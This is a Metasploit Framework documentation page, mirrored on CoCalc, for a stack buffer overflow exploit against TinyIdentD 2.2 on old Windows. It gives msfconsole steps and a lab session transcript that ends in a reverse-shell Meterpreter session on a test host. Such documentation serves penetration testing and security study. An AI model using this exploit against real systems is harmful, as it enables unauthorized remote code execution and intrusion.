CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md
Views: 11789

Vulnerable Application

This module exploits a stack based buffer overflow in TinyIdentD version 2.2.

If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.

Download:

Verification Steps

  1. Start msfconsole

  2. use exploit/windows/misc/tiny_identd_overflow

  3. set RHOSTS <rhost>

  4. set TARGET <target>

  5. run

  6. You should get a new session

Options

Scenarios

TinyIdentD 2.2 on Windows XP SP0 - English (x86)

msf5 > use exploit/windows/misc/tiny_identd_overflow
msf5 exploit(windows/misc/tiny_identd_overflow) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows 2000 Server SP4 - English
   2   Windows 2000 Pro All - English
   3   Windows 2000 Pro All - Italian
   4   Windows 2000 Pro All - French
   5   Windows XP SP0/1 - English
   6   Windows XP SP2 - English
   7   Windows XP SP2 - Italian


msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
target => 5
msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
rhosts => 172.16.191.140
msf5 exploit(windows/misc/tiny_identd_overflow) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
[*] Sending stage (176195 bytes) to 172.16.191.140
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400

meterpreter > sysinfo 
Computer        : WINXP
OS              : Windows XP (5.1 Build 2600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >